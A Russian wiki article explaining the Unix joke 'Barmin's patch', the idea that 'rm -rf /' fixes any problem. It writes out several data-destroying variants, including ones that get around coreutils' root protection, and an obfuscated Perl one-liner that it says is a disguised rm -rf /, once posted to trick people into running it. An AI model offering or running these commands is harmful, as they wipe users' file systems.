Циклопедия скорбит по жертвам террористического акта в Крокус-Сити (Красногорск, МО)

Патч Бармина

Материал из Циклопедии
Перейти к навигации Перейти к поиску
Выполнение команды rm -rf

Патч Бармина — шутка, описывающая универсальное средство устранения любых неполадок в Unix-системах. Сам «патч» состоит из одной строки, которую следует набрать в консоли root:

rm -rf

Юмор заключается в том, что указанная команда действительно устраняет любые неполадки вместе с самой Unix-системой. (Команда rm, вызванная с параметрами -rf /, не требуя подтверждения, удаляет все файлы из корневого каталога.)

Впервые шутка (ещё не бывшая шуткой) прозвучала в конференции ru.unix как патч для SCO UNIX от участника по имени Vladimir Barmin (откуда и название патча), в дальнейшем её начали использовать в качестве ироничного обозначения универсального и тривиального решения.

Начиная с версии 6.2 coreutils команда rm дополнительно проверяет аргументы и отказывается удалять корневой каталог[1]. Но и на этот патч есть патч:

cd / && rm -rf *

Актуальная версия:

rm -rf /*

Программа из одной строчки[править]

В 2003 году на Linux.org.ru появилась провокация: автор опубликовал «программу из одной строчки на Perl» и попросил подсказать, почему она не работает:[2]

echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Эта программа на поверку оказалась хорошо замаскированным rm -rf /. При попытке запуска её из аккаунта root пользователь мог поплатиться всеми подмонтированными с возможностью записи файловыми системами.

Источники[править]

Ссылки[править]